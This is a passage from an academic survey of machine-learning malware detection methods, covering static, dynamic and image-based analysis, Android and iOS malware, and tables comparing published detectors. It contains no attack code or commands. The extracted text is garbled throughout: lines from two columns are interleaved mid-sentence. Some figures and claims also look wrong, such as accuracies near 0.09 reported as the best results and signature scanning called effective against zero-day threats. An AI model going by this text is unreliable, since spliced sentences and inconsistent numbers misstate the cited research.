RNN is classified into 9 classes of malware before feature vector than 98% accuracy is attained while a small footprint is main-
creation by RNN. tained over the device and False Negative rate is obtained as
8
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Fig. 5. Recurrent Neural Network (RNN).

Table 1
Comparison of static analysis techniques using ML.
Research paper Features Type of Algorithms of classification
analysis
Alani et al. (2022) [94] RFE, SHAP, Drebin-215 dataset Static PAIRED
Fang et al. (2019) [40] PE files, RL Static DT, RF, SVM, DQFSA
Raff et al. (2018a) [53] Byte sequence Static CNN
Davis et al. (2017) [27] Byte’s sequence Static CNN with RNN
Ahmadi et al. (2016) [30] Bytes 1-g, metadata features, entropy Static Ensemble of Gradient Boosting
statistics, Haralick and Local Binary Trees
Pattern 0. features, ASCII strings
Han et al. (2015) [93] Visualized image, entropy graphs Static Clustering
Annachhatre et al. (2015) [92] Profiling functions, sequence Static Hidden Markov models
Gonzalez et al. (2013) [91] API calls per DLL, library feature Static Euclidean distance and
artificial neural networks

0090. The Drebin-215 dataset is utilized for experimental pur- Memory dumps are retrieved from the virtual environment
poses. Table 1 compares static analysis-based malware detection during the execution of malicious and legitimate samples [98].
techniques using ML. WinDbg is utilized for redesigning the system calls by tracing
them. The Random Forest model is used for testing. RF tests 10
5.1.2. Dynamic and hybrid analysis based malware detection tech- samples which include ransomware and Remote Access Trojan
niques (RATs), and 6 legitimate samples. The experimental result shows
Dynamic analysis involves executing malwares in a real-time a true +ve rate of 98% and a false +ve rate of 0%. Research work
environment or sandbox-like virtual environment for extracting
is carried out on the application of Machine Learning in Side-
features. Earlier most of the traditional techniques extract API
Channel Analysis (SCA) [99]. Cryptographic keys of cryptographic
calls from executing malware processes and used them as input.
The ML-based malware detection method is proposed by utilizing devices are extracted by applying SCA. Consumption of power
Anubis which was earlier called TT analyse for extracting report is considered a feature set. The Least Squares Support Vector
files of XML [41]. The dataset consists of 220 malicious samples Machine (LS-SVM) classifier is utilized for malicious classification
and 250 legitimate samples. Based on the reports, term frequen- that obtains a success rate of 75%.
cies are generated which are used as a feature set. Utilization of The online malware detection method is implemented over
the J48 model provides a good result with a True +ve rate of 96% android and Linux OS [100]. 210 legitimate software and 503
and a False +ve rate of 2.4%. malicious samples with 2 rootkits are involved in an investigation
In the work [95], CW Sandbox is utilized for extracting sys- with this model. With the help of different algorithms such as
tem calls of the dataset which is sized with 3133 samples of decision tree, the rate of detection is attained as 83% and a False
malware. From the sequence of system calls, an N-gram feature +ve rate of 10%. EM-Based Detection of Deviations in Program
set is developed. Also, a clustering algorithm is utilized to map Execution (EDDIE) is proposed where the emission of electromag-
malwares with similarities. 33,698 anonymous samples are used netic IoT devices is monitored and the statistical irregularities are
to verify this framework, and 99.7% of the F -score is attained. defined with the EM emissions, which are based on the injec-
The Android malware classification model [96] is proposed in tion of malicious code in the app’s runtime environment [101].
which API functions of android apps are classified and sources
Intentions for malevolent conduct will be defeated in this way.
and sinks of android apps are differentiated. It also involves a
In the work [80] neural networks are trained by using the feature
flow-tracking mechanism. Malware behaviour is discovered by
of API calls in the hidden layers. Null terminated strings are also
the sources and sinks. A similar rate of precision and recall is
attained with 92.3% at the end of the analysis. TrumanBox is extracted for feature extraction from the memory of processes.
utilized [97] to extract the features of the network like request The projection technique is applied for minimizing the dimension
count, data size, and requests received per day for detecting of features and those are managed by the neural network.
malicious activities of Hypertext Transfer Protocol (HTTP) request A Hybrid IoT botnet detection method is proposed for the In-
communication. Irregularity behaviours of the network like tun- dustrial IoT environment [102]. Printable string information (PSI)
nelling and backdoors are identified by using the dataset of 695 rooted sub-graph features are generated during static analysis
samples of malware. and they are enhanced in dynamic analysis. PSI is utilized for
9
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 2
Comparison of recent dynamic and hybrid malware detection techniques using ML.
Research paper Features Type of analysis Algorithms of classification
Nguyen et al. (2022) [102] PSI rooted sub graph features, Both static and Hybrid botnet detection
Industrial IoT dynamic
Husainiamer et al. (2020) Mobile behaviour and Both static and POC
[103] vulnerability exploitation dynamic
Jeon et al. (2020) [104] Behaviours associated with Dynamic DAIMD, CNN
memory, process, and system
call
Han et al. (2019a) [42] Static and Dynamic API Both static and K-NN, RF DT, Extreme Gradient
sequences dynamic Boosting
Han et al. (2019b) [43] Sections size of PE, DLL Both static and K-NN, RF, DT, Extreme
information, APIsequences, IP, dynamic Gradient Boosting
DNS, port and domain Request
operations
Pekta, s and Acarman File system, API call N-grams, Dynamic PA-I, PA-II, CW, AROW, NHERD
(2017) [105] network and registry features
Nissim et al. (2018) [98] Memory dumps, WinDbg, RATs Dynamic Random Forest model
Nazari et al. (2017) [101] EM emissions, Dynamic EDDIE
Rasthofer et al. (2014) [96] API functions, android Dynamic Flow tracking mechanism
Demme et al. (2013) [100] Decision tree, android Dynamic Online malware detection
Hospodar et al. (2011) [99] SCA, Cryptographic keys, Dynamic LS-SVM
power consumption
Schwenk et al. (2011) [97] HTTP request communication, Dynamic TrumanBox
network behaviours
Rieck et al. (2011) [95] CW Sandbox, N-gram feature Dynamic Clustering algorithm
set
Firdausi et al. (2010) [41] Anubis, XML reports Dynamic J48 model

traversing the static analysis-based graph and graph-based fea- a Portable Executable file, which is 8 bits in size, yields a grey
tures are useful in classifying the samples of benign and malware. picture vector [30]. It is found that the texture pattern of various
A dataset with the size of 83 430 executable samples is used families of malwares becomes the same in the NatarajImage. De-
for experimentation. Among the samples 5531 are IoT botnet spite NatarajImage’s flaws in packing and obfuscation methods, it
samples and 2799 are IoT benign samples. Results of the hybrid inspired additional research [30,109–111]. By using a black-and-
method show that 98.1% detection accuracy and 91.99% classifi- white image vector obtained from hexadecimal-sized instruction
cation accuracy are attained for IoT botnets. Methods of dynamic in the disassembly file, a further embedding method is proposed
and hybrid analysis are compared in Table 2. namely AndrewImage for malware detection [27]. Comparing
these mentioned embedding methods; AndrewImage provides
5.1.3. Image based malware detection techniques better performance in terms of robustness and interpretability
Classification of malwares becomes more crucial in these than NatarajImage in which instruction-level information is em-
years. Malware classification is always linked to the process bedded. Kaggle dataset is used for malware identification in the
of spotting newly emerging malware. Fig. 6 portrays various work [30]. Features are extracted from raw binary files as well as
malware detection methods utilizing image processing. According disassembled files and represented as images. XGBoost classifier
to a study by Microsoft, security service providers face a challeng- is used to extract the features. The accuracy of performance is
ing problem when managing vast amounts of data for malware 95.5% according to the 5-fold validation result.
detection [106]. Classical techniques failed to fulfil the demands An automotive framework for finding anonymous vulnera-
and requirements while analysing malwares, which is based on ble activities is achieved using methods of neural networks like
signature and behaviour, hence effective methods are necessi- computer vision and classification of images [76]. Malware bi-
tated [107]. The core bytecodes of the program are converted into naries are transferred into 8-bit vectors for feature extraction
grayscale images where pixel representation is applied for every purposes and grayscale images are prepared as input to new
byte code. Then the sequence of bytes is wrapped artificially training sets of an ML algorithm. For both the training and testing
to form a two-dimensional array. Classification and clustering phases of classification, the Malimg dataset is used. The results
methods are used for extracting features and machine learning have an accuracy of 0.0856, an average training time of 0.218 s,
techniques are applied to them [108]. and a 0.0211 s testing time while making use of the nearest
By utilizing visualization techniques, the classification model centroid. The highest result of accuracy is obtained while using
for malwares is simplified by adapting image processing tech- random forest i.e., 0.0916 with 1.72 s average training time and
niques [69,108]. Grayscale images are obtained as a result of 0.0063 s testing time. However, when using different algorithms
conversion from malware binaries [108]. GIST descriptor is em- for classification like perceptron, stochastic gradient, decision
ployed to calculate texture features by decaying images. The K tree, and multilayer perceptron, accuracy is obtained as 0.0905,
nearest Neighbours algorithm with Euclidean distance is used for 0.087, 0.088, and 0.087 respectively. Furthermore, classification
classification purposes. To evaluate the performance bigram dis- performance is lacking for stochastic gradient and perceptron.
tributions are computed from core data. The accuracy of malware Time consumption and manpower over feature extraction be-
classification is attained as 0.98 with time consumption of 56 s come a major concern apart from accuracy [30,110]. It causes the
while considering feature vectors of bigram distributions. training and detection phases to be less effective.
NatarajImage is the first implemented malware embedding Impressed by NatarajImage, to classify the different malwares,
method which utilized binary files [108]. The malware binary of a random forest method is introduced [112]. Lempel–Ziv Jaccard
10
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Fig. 6. Malware detection process based on image processing.

Table 3
Comparison of recent image-based malware detection techniques using ML.
Research paper Features Type of analysis Algorithms of classification
Jeon et al. (2020) [104] Behaviour images Image-based DAIMD, CNN
Raff et al. (2017) [113] NCD Image-based LZJD
Drew et al. (2017) [114] Time consumption Image-based Strand gen sequence method
Kosmidis et al. (2017) [76] Grayscale images Malimg dataset Image-based Stochastic gradient, DT, and multilayer perceptron
Ahmadi et al. (2016) [30] Grayscale images Kaggle dataset Image-based XGBoo st
Garcia et al. (2016) [112] Grayscale images Image-based RFmethod

Distance (LZJD) is proposed for malware classification from core screening process. The signature-based technique is utilized to
data, which provides an improvised performance than Normal- protect from malware attacks currently. The malicious behaviour
ized Compression Distance (NCD) [113]. The strand gene se- of every malware sample is verified with the repository of anti-
quence method is introduced regarding malware classification malware where behaviour is obtained in the form of string. The
with an accuracy level of 98.89% and requires minimum time signature-based technique has two major drawbacks. The first
for training [114]. However, when dealing with large-sized mal- one is that it is difficult and a time-consuming method. The
wares, the time consumption for detection is substantially longer. second one is that it is not suitable for obfuscation techniques ap-
Table 3 contrasts recent image-based malware detection tech- plied by the attackers [120]. With these incorporated drawbacks
niques using Machine Learning. malware attackers generate various variants to showcase similar
behaviour by employing obfuscation techniques in an automated
5.2. Mobile malware detection manner. Thus, it becomes a herculean task for anti-malware
providers to concentrate on those weaknesses, while researchers
Usage of mobile devices has increased in everyone’s daily focus on finding a way to develop defence mechanisms against
activities. Bank transactions, ticket booking, social network follow- mobile malware attacks.
ups, online learning, online gaming, and so many other activi-
In common by applying repackaging techniques malicious ac-
ties are involved with mobile devices like smartphones, tablets,
tivities are carried out in genuine applications. Nearly 86% of
and laptops. According to the statistics, the economy of smart-
Android malware is acquired by using this technique [121,122].
phones is higher than PCs [115]. Recent approaches implemented
Malware coder changes the app downloaded from famous app
for defending malware fail to provide effective security by us-
sales platforms like Google’s play store [123]. Attacker applies
ing signature-based techniques. Based on the recent survey, the
reverse engineering techniques to the disassemblers which are
false-positive ratio is higher for the malware detection models
cost-free like ApkTool [124]. The malicious payloads are then
proposed while considering obfuscation techniques. Attackers
integrated into the app’s original code [125,126], and the at-
eagerly target mobile devices compared to PCs because mobile
devices contain with the more sensitive and confidential infor- tacker uploads the maliciously coded apps to the marketplace.
mation of users [9,116–118]. Besides, smartphones are associated This prototype can fool legitimate users who are unaware of the
with SIM cards which are responsible for transactions based on discrimination between the legitimate app and the maliciously
one-time passwords also known as OTP [119]. coded app. Malicious codes are added during the installation of
Based on the projection for the six months of apps down- malicious apps and the intended attacks of various types are
loaded by users worldwide, 25% of apps are used at most only implemented. Tools utilized for performing reverse engineering
once. This environment of rising users of mobile devices provides on android and apple apps are verified by creating a model and
an attraction for malware coders. Malware writers implement the process of creating repacked malware is automated [127].
their code to take personal and banking information. However, Malicious payloads are injected by utilizing GUI interfaces by
hundreds of apps have been removed by Google’s play store the proposed frameworks like DroidJack and AhMyth [128–130].
and Apple’s app store considering security concerns. As per the After the installation of the repackaged app, malicious attackers
McAfee report, in 2006 the largest threat was identified regarding will get an alert regarding the maliciously affected device and
malware infection over iOS apps and android apps. will extract information from that device by recording the mi-
Elimination of malicious apps is carried out by app stores of crophone, taking images, sending messages, and interpreting the
Google and Apple but a few infected apps escape during the contacts with the use of the GUI framework.
11
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Providers of mobile OS seek solutions to this unconditional system which insists on the processes of application mined from
flood of malware by monitoring the malware-affected users. the malicious code and K-fold cross-validation is implemented
Google, which has been permissioned to perform this role, is re- by Bayesian Network for performance evaluation. While utiliz-
quired to offer deep scanning for each new app that is made avail- ing permissions, it attains an improved detection ratio [137].
able in the Play Store in order to find nefarious actions. Further, Static analysis methods do not intend to infect a device and
newly developed apps should be surrendered to Bouncer [131]. have no standard proposal for gathering information while ex-
In the year 2012 automated scanning system was implemented ecuting in a restricted environment. However, code obfuscation
with typical features as follows techniques cannot be avoided by static methods [130,133,138–
140]. Epic build pattern for each source and destination of ICC is
• Static analysis while searching for identified vulnerabilities included with numerous factors like location of Inter Component
• Behaviour identification by executing and analysing the app Communication (ICC), source and destination, operations of ICC,
with a virtual emulator (QEMU)
data type, and other useful information for analysis [141]. Flow-
• 5 min of tracking the behaviour of the app Droid [142] also executes ICC analysis over the code and configu-
• Investigation over each button of the app ration files of the testing application. It decreases false positives.
Static analysis is performed by a bouncer by utilizing anti- By collecting features from both static and dynamic analysis new
malware providers like VirusTotal which evaluates with 60 var- methods for classifying malwares are introduced, which evaluate
ious anti-malwares. By using signature-based techniques, a ma- the malicious behaviour of android applications [143].
licious sample is discovered only if the signature is available in Machine Learning methods are applied for classification pur-
the repository. Thus, it is effective in combating against zero- poses in which a feature set is obtained by employing both static
day threats [132,133]. While performing dynamic analysis, the and dynamic analysis for familiar malicious and non-malicious
application is executed for a time limit of 5 min. There is a applications [144]. BRIDEMAID framework makes use of dynamic
possibility of the app not disclosing its malicious behaviour in analysis for detecting malicious behaviour at the time of ex-
this period. Also, malware can be aware when it is run virtually, ecution, where multiple levels of monitoring are carried over
in which malicious activity can be carried out to boycott the sand- devices, applications, and behaviours of users [145]. Exclusively
box’s detection [134]. Android and iOS malware detection and dynamic features are only considered for classification by the
mitigation techniques are further explained in detail as follows. Andromaly framework [146]. It is a host-oriented system for
detecting malwares. Various features are monitored like usage of
5.2.1. Android malware detection techniques CPU (Central Processor Unit), packet count sent via the network,
From 2019 onwards, Android has been the most dangerous count of live processes, and the level of the battery. Besides,
OS [5,135,136]. Malware for Android continues to evolve at a events acquired from mobile devices at the time of execution
rapid rate, continuing a four-year trend. The first highest devel- are also monitored. Sandbox is a system where malicious apps
opment of android malware was recorded in the mid of 2016. are analysed by combining static and dynamic methods [147].
Because of its security breaches, it remains in first place of the Application is executed in a sandbox environment and hazardous
infected OS with the highest vulnerabilities. As per the CVE (Com- events like file open processes and remote server connections
mon Vulnerabilities and Exposures) database, over 417 security are investigated. The denial of Service process is implemented by
leak scenarios were recorded in 2019. evaluating the method in a sample application for commencing
Trojans occupy a major part in the distribution of android the exterior binary program and creating sub-processes in an
malwares in 2019, precisely 93.93%. An android Trojan named indefinite loop.
‘‘Hiddad’’ is one of the top 10 android malwares of the year 2019 Power consumption is considered a classifying feature by mul-
which is defined as an advertising specialist, hiked its position tiple techniques proposed amid malicious and legitimate mobile
from 8 to 2 from the previous year with 18.7% infection. It con- Apps. It is assumed that there is a high association between
fuses users and disables security software while being concealed the power consumption prototype of mobile devices and local-
in other Google Play Store apps. The second-ranked Android ity [148]. 20 smart phones’ power consumption data are analysed
ransomware in the top 10 list of android malwares was created over the course of three months. Nokia 5500 mobile is utilized
in 2019 with the intention of extorting legitimate users who for testing purposes to assess the mobile malware in a real-
earn more money and consequently fall victim to the attackers. time environment. Jackdaw tool is implemented by correlating
Due to the extensive use of mobile devices rather than PCs and control and data-flow information obtained from binary files,
notebooks, economic damage also increases. Most ransomwares with the employability of both static and dynamic analysis [149].
involve blocking devices by considering the features of the cam- This hybrid analysis helps to discover API call groups that are
era and backup. More than 78k new ransomware deployment of associated with high-level actions. Evaluation is carried out with
Android was found in 2019. 2136 different binary samples of both legitimate and malicious
Online banking and purchasing environments place Android binaries.
Password Trojans in the third place. Login credentials are TaintDroid is proposed, which is the expansion of Android
skimmed, and multiple user accounts are targeted by cyber at- OS [150]. It is possible to trace the stream of private sensible
tackers because of the lack of security features associated with information with the help of third-party apps that are download-
these apps. Though there are updates and upgrades in the ver- able malware. Besides, the real-time application environment is
sions of android, it is still a well-suited environment for illegal monitored with application accessibility and users’ data manipu-
cyber businesses. A prototype of the application and its disassem- lation. By utilizing predefined patterns, research work is carried
bled code are analysed for feature extraction in static analysis. out on the detection of suspicious temporal patterns for detecting
The behaviour of the application is investigated at run time intrusion [151]. Features like memory on demand, CPU usage,
by applying the dynamic analysis technique. Hybrid analysis and keyboard utilization are also considered. The data set is
techniques analyse the behaviour of any application before the derived from developing and accessing five infected android apps.
execution and after the execution. Individual flaws of static and DroidRanger [152] is a behaviour and heuristic-based approach
dynamic analysis are resolved by combining these two. proposed for android malware detection. Experimentation is done
AndroDialysis is a classification model based on the intents of over 204, 040 apps of 5 distinct markets of android from May
android [39]. It concentrates on the runtime binding messaging 2011 to June 2011. Among those apps, 211 malicious apps are
12
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

effectively detected and 2 complicated zero-day malware over behaviours. To handle the dynamicity of applications, an incre-
40 samples are discovered where 11 apps are from a legitimate mental learning model is built without modernizing the complete
market. HIN and following the embedding model. Proximity amid new
SmartDroid is implemented to detect android malwares where and existing applications is identified quickly and numerical em-
behaviours of automotive Android app user interface interactions beddings of different semantics are cumulated. Above 80,860
are prioritized, and problems with them are attempted to be malicious samples and 1,00,375 benign application samples are
fixed [153]. The hybrid analysis is applied to expose the UI- investigated during the experimentation. HAWK achieved the
related trigger conditions of android apps. Activities and graphs of highest detection accuracy by taking 3.5 ms only to detect appli-
function calls are analysed statically to extract feature-like paths cation samples which implies that its augmented training time is
of activity. The dynamic analysis helps in tracing the elements 50 times faster compared to the existing methods.
of UI. Andrubis [154] is a free and complete automotive system SEDMDroid is developed which is an enhanced stacking en-
for analysing android related applications. It makes use of hybrid semble android malware detection framework [47]. Random fea-
analysis techniques over Dalvik VM and the system level. The ture subspace and bootstrapping samples techniques are adopted
dataset is obtained by examining more than 10 lakh android for generating subsets and Principal Component Analysis (PCA)
applications where 40% of which are malicious. Recent malware is executed over every subset. The accuracy of SEDMDroid is
behaviours are defined by this dataset. explored by observing the entire principal components and uti-
Mobile-Sandbox is an automatic analysis system implemented lizing the dataset for every MLP base learner during training.
for android applications [155] using static and dynamic analysis Further SVM is used as the fusion classifier for learning and result
techniques. The Manifest of the application is parsed and decom- prediction. On the basis of experimental results, SEDMDroid ac-
piled in static analysis. Every completed action is recorded from complished 89.07% accuracy for the dataset of multi-level static
API calls by applying dynamic analysis. Machine Learning tech- features like permission, sensitive API and monitoring system
niques are employed in the results of both analyses. Evaluation event and then 94.92% accuracy for large-sized public datasets.
is done in more than 69 000 apps. Supervised and unsupervised Fast Android Malware Detector (FAMD) is proposed with the
learning classification approaches are applied for detection when aim of fast malware detection by using a combination of vari-
malicious behaviour is revealed by applications [156]. It is differ- ous features [162]. In the first step, the original feature set is
ent from previous works as it employs a visualization component. created by extracting the permissions and Dalvik opcode se-
Also, various methods are proposed using static analysis to detect quences. The Dalvik opcodes are then subjected to pre-processing
the interaction pattern between the modules of the application using the N-Gram approach. Further feature dimensionality is re-
and the lack of privacy. duced by employing a symmetrical uncertainty-based FCBF (Fast
An image-based method for detecting android malwares is Correlation-Based Filter) algorithm. At last, features with reduced
developed from executable binaries, which classifies malicious dimensions are forwarded as input for the CatBoost classifier
apps from legitimate apps [157]. The textual image classification to detect and classify malware. The Drebin dataset is used for
method is utilized to extract the micro-level patterns of images. experiments, and improved results are obtained in terms of de-
Retrieval techniques utilized for music information are applied tection accuracy and classification accuracy, which are 97.40% and
to executable files to distinguish between malicious and legit- 97.38%, respectively.
imate apps [158]. The feature set is the results obtained from GDroid is proposed on the basis of a Graph Convolutional
audio, which is created from executable files. Machine Learn- Network (GCN) in order to detect and classify the families of an-
ing algorithms are applied regarding the examination of perfor- droid malware [163]. Apps and android APIs are mapped as a big
mances attained by considering feature vectors collected from heterogeneous graph in which the original problem is converted
audio signals. as a node classification task. On the basis of invocation relation-
A reinforcement learning-based android malware detection ships and API usage patterns, edges are built as ‘‘App-API’’ and
model is proposed for combating adversarial attacks [159]. Single- ‘‘API-API’’. Following that, a heterogeneous graph is forwarded
policy and multi-policy are suggested for the scenarios with to the GCN model where nodes are generated by incorporating
complete knowledge and limited knowledge respectively, on the topological structure and node features. According to the experi-
basis of evasion attacks. Four conventional classifiers are utilized mental results, the GDroid system achieved a detection accuracy
in this which include traditional ML, bagging, boosting and deep of 98.99% and a false +ve rate of less than 1%. In addition, for
neural network. Based on the experimental results, single-policy malware family classification average accuracy is attained as 97%.
utilization attained a 90% fooling rate with 10% modification. On Profile-hidden Markov model based android malware detec-
other hand for multi-policy, 95% fooling rate is achieved with 10% tion model ProDroid [164] is a behavioural method proposed for
modification. malware detection and classification. An encoded list is created
Finding the best features that distinguish malware in a dis- by decompiling the android malware dataset for discovering sus-
tinctive way is tough using machine learning techniques and to picious API classes or methods. Encoded patterns are used for
overcome the difficulties, an Android malware detection method creating several sequence alignments for various malware fam-
is proposed by extracting malicious system call codes from typi- ilies and they are applied for generating profile-hidden Markov
cal system call sequences built by applications [160], depending models. According to the log-likelihood score, unknown benign
on the occurrence of malicious system call codes. System call and malicious applications are classified by the model. The ac-
sequences are represented as first-order ergodic Markov chains. curacy of ProDroid is attained as 94.5% which is higher when
Reliable accuracy is obtained at about 0.95 for the data sets of bal- compared with existing frameworks.
anced as well as unbalanced. Considering precision, it is obtained A solution to detect android malwares is proposed making
above 0.90 for balanced and slightly unbalanced datasets but 0.72 use of Semantic Distance based API Clustering (SDAC) in the
precision is attained for highly unbalanced data sets which is work [165]. The value of new APIs to malware detection is as-
somewhat lower. sessed on the basis of current API-spanning API clusters. When
HAWK, a malware variant detection framework is proposed assigning APIs to vectors on sequences, a single neural network is
to overcome the malicious issues related to the current android used, and discrepancies across API vectors are viewed as semantic
applications [161]. A heterogeneous Information Network is mod- distances. API clusters and classification models are updated on
elled by combining android entities and relationships among the basis of true labelled training data and pseudo-labelled test
13
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

data. Performance evaluation is implemented over 70k android integrated malware were connected to the bot master server
app samples in a 5 years period time. Results depict that SDAC for updating the logic of programming [173]. iOS malware fea-
attained accuracy with a 97.49% F-score and slow ageing speed tures are explored and after classification, 36 families of iOS
with a 0.11% reduction in F-score. malwares are identified between 2009 and 2015. Besides, these
A Contrastive Learning-based strategy is suggested to identify results are disseminated over legitimate markets and used for
and categorize android malware to support model pre-training reducing the infections of iOS devices. By incorporating machine
without using labels and reduces the effects of prior knowl- learning techniques and an opcode-oriented feature set, malware
edge [166]. According to the results, more than 96% malware detection methods detect attacks from the malicious samples of
detection accuracy is attained from the public dataset and more iOS [174]. The histogram is created as the result of analysing
than 98% accuracy is achieved from malware class and family. To these applications. The dimension of every histogram denotes
detect hazardous fake android anti malwares, HamDroid [167] how many times the opcode is displayed in the corresponding
is employed on the basis of static permissions and applications code. The OneR algorithm is utilized with 0.971 precision and
making use of MLP (Multi-Layer Perceptron) neural networks. A recall as 1 for classifying the samples as malicious and benign.
new dataset is created with the collection of harmful and benign Research works are concentrated on issues and open prob-
android anti-malware applications by using Virus Total. Further, lems like stealing sensitive confidential information of the user
it is applied to train and evaluate MLP neural networks. As per- which should be resolved [175]. In order to address this, reme-
missions are extracted from manifest files before the installation dial purpose dynamic analysis – which is appropriate for iOS
of android anti-malware, HamDroid seems feasible. Results of environments – is used to propose solutions in iOS applications.
98.62% accuracy, 95.56% precision, and 97.73% recall, and 96.63% Assessment processes concentrate on the need for user interfaces
F1-score were obtained by experimentation. during dynamic analysis among iOS apps [176]. A high interaction
MSerNetDroid [168], an Android malware detection frame- Honeypot is implemented based on Mac OSX. More than 6000
work, used a multi-head squeeze-and-excitation residual net- blacklisted URLs are evaluated for predicting malware spread in
work to extract features from the manifest file permissions, API Mac OS X.
calls and hardware features for app classification. Multi-Head Kernel-based SVM is applied for detecting the Mac OS mal-
Squeeze-and-Excitation Residual block (MSer) architecture is de- ware using library calls [177]. A dataset of 152 malicious and
signed for learning essential correlation amid features. MSerNet- 450 legitimate files is used for both training and testing. General
Droid framework is evaluated by analysing 2126 malware apps supervised learning is used over the dataset. Detection accu-
and 1061 benign apps which are obtained through VirusShare racy at the rate of 91% and FPR of 3.9% is attained based on
and Google Play Store. The experimental outcomes reveal that the performance of the system. Further, the Synthetic Minority
the MSerNetDroid framework achieves 96.48% accuracy. Recently Over-sampling Technique (SMOTE) is also used. While employing
implemented android malware detection techniques making use SMOTE, the accuracy rate increased to 96%, and FPR was obtained
of ML are depicted in Table 4. at less than 4%.
Android and iOS-based Mobile Banking Applications (MBA)
5.2.2. iOS malware detection techniques of various banks are completely analysed by applying hybrid
Mac OS environment is more secure compared to the other analysis and a threat model namely Vulnerability Assessment
environments like windows and android [5]. 107 malicious sam- and Penetration Testing of Android and iOS Mobile Banking Apps
ples are programmed for breaking Mac OS in 2019. As there (VAPTAi) is proposed [178]. Based on the systematic investigation
are no malware defence systems, it is crucial to concentrate on of MBAs it is found that MBAs can be affected by Man-in-the-
Mac OS. Confidential information theft is performed by more Middle Attacks (MitM). It is observed that few MBAs used simple
distinct malwares in iOS devices. Based on the report of Shannon, HTTP protocol for transferring data without any security features.
watering hole spyware is reported in 2019 which is an iOS zero- Forged or self-signed certificates are received by MBAs in many
day malware. It has the ability to grasp private information like cases which will lead to SSL or TLS MitM attacks.
iMessage photos as well as GPS locations [169]. In the same year ChanDet, a channel model is introduced on the basis of five
researchers also found OceanLotus, a new iOS malware that uses conditions while analysing the complete operation method and
cutting-edge tactics to evade malware analysis. comparing the correspondences and modifications of several ap-
Similarly, exodus malware obtains information about phone plications [179]. It is found that iMessage has a lack of confiden-
contacts, audio recordings, photos, videos, GPS location and de- tiality which implies it is not a potential channel. It provides a
vices [170]. It spreads via phishing websites which impersonate solution for testing the application as a potential channel. With
the mobile carriers of Italy and Turkmenistan. FinSpy is a similar the inspiration of the phylogenetic concept, the iOS malware
kind and is capable of stealing confidential information such classification method is implemented on the basis of mobile
as SMS or MMS messages, phone call records, emails, phone behaviour and vulnerability exploitation [103]. A Hybrid analysis
contacts, files, videos and GPS locations [171]. As per Kaspersky’s is applied for experimental purposes. The significance of the
report, Myanmar users are targeted for spying by using the latest proposed iOS malware classification towards malware detection
versions of FinSpy variants of iOS and Android devices. is proved by conducting Proof of concept (POC).
In 2019, Trojans hold the top spot with 59.87% of the market iOS Chameleon apps are systematically studied and the
share, while 34.66% of backdoors in second place pose serious se- Chameleon-Hunter detection tool is utilized for discovering the
curity risks [5]. It is known from the list that trojan and backdoor PHI-UIs and semantic feature set created with the help of nontriv-
play specific roles because of the high-level explosion. Trojan ial techniques [180]. Chameleon-Hunter is a static analysis-based
namely Flashback with 38.36% has different variants that are method which identifies the maliciousness of PHI-UI. It was
involved in the infection of Mac OS over the last 10 years. It uses discovered that among 28 000 iOS apps on the app store, 142
java for breaking and once java is enabled in browsers it starts its Chameleon apps were involved in malicious activities. After dis-
activation and infection by reading passkeys through keyloggers. closing issues with Apple, most of the iOS Chameleon apps are
More research is needed to understand Mac OS malwares because removed or suspicious UIs are disabled based on the investiga-
it has been there for ten years and is still active. tion. Chameleon-Hunter is very active and achieved precision and
Considering the Apple environment, the ISAM model [172] recall at 92.6% and 94.7% respectively.
for detecting malwares performs wireless infection and self- Also, the unpredictability of OS X malware is depicted by
propagation among iPhone devices. Six malicious payloads of those research works. Complicated approaches are used by few
14
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 4
Comparison of recent Android mobile malware detection techniques using ML.
Research paper Features Type of Algorithms of classification
malware
Zhu et al. (2023) [168] Multi-head squeeze-and-excitation Android MSerNetDroid
residual network, API calls and
hardware features
Seraj et al. (2022) [167] MLP, fake android anti malwares, Android HamDroid
static permissions and applications
Yang et al. (2022) [166] Past knowledge, model pre-training Android Contrastive Learning
Xu et al. (2022) [165] Semantic distance-based API Android SDAC
clustering, API vectors
Kumar Sasidharan et al. (2021) Profile hidden Markov model, Android ProDroid
[164] encoded patterns, log likelihood score
Bai et al. (2020) [162] Permissions and Dalvik opcode Android FAMD
sequences, N-Gram technique, FCBF,
CatBoost classifier
Zhu et al. (2020) [47] Random feature subspace and Android SEDMDroid
bootstrapping samples techniques,
PCA, MLP, SVM
Hei et al. (2021) [161] Behaviours Android HAWK
Surendran et al. (2021) [160] System call codes, system call Android Ergodic Markov chain, system call
sequence pattern analysis
Rathore et al. (2021) [159] Single policy and multi policy Android Traditional ML, bagging, boosting and
deep neural network
Hashemi et al. (2019) [157] Micropatterns Android Textural image classification
Farrokhmanesh et al. (2019) [158] Audio files Android Music Information Retrieval
Feizollah et al. (2017) [39] Messages, Bayesian Network Android AndroDialysis
Faiella et al. (2017) [145] Behaviours of users Android BRIDEMAID
Ferrante et al. (2016) [156] Change in environment Android Supervised and unsupervised
Lindorfer et al. (2015) [143] Behaviour Android ML methods
Polino et al. (2015) [149] API calls groups Android Jackdaw tool
Lindorfer et al. (2014) [154] Malware behaviours Android Andrubis
Enck et al. (2014) [150] Private sensible information Android TaintDroid
Spreitzenbarth et al. (2014) [155] Manifest of app Android Mobile-Sandbox
Zhou et al. (2012) [152] Behaviour and heuristic Android DroidRanger
Zheng et al. (2012) [153] Behaviours of automotive User Android SmartDroid
Interface

Table 5
Comparison of recent iOS mobile malware detection techniques using ML.
Research paper Features Type of malware Algorithms of classification
Lee et al. (2021) [180] iOS Chameleon apps, UI based illicit activity Mac OS Chameleon-Hunter
threats, suspicious PHI-UI
Husainiamer et al. (2020) [103] Mobile behaviour and vulnerability Mac OS POC
exploitation
Zhou et al. (2019) [179] iMessage Mac OS ChanDet
Pajouh et al. (2018) [177] Library calls Mac OS Kernel-based SVM, SMOTE
Bojjagani et al. (2017) [178] Mobile banking apps Android and iOS VAPTAi
Cimitile et al. (2017) [174] Opcode Histogram Mac OS OneR
Garcıa et al. (2016) [173] Malware families Mac OS KeyRaider analysis, IDA, Hoper
Lindorfer et al. (2013) [176] A Mac OSX Mac OS iHoneypot

malware families to threaten the users of OS X and many of backdoors associated with OS and firmware attached to the
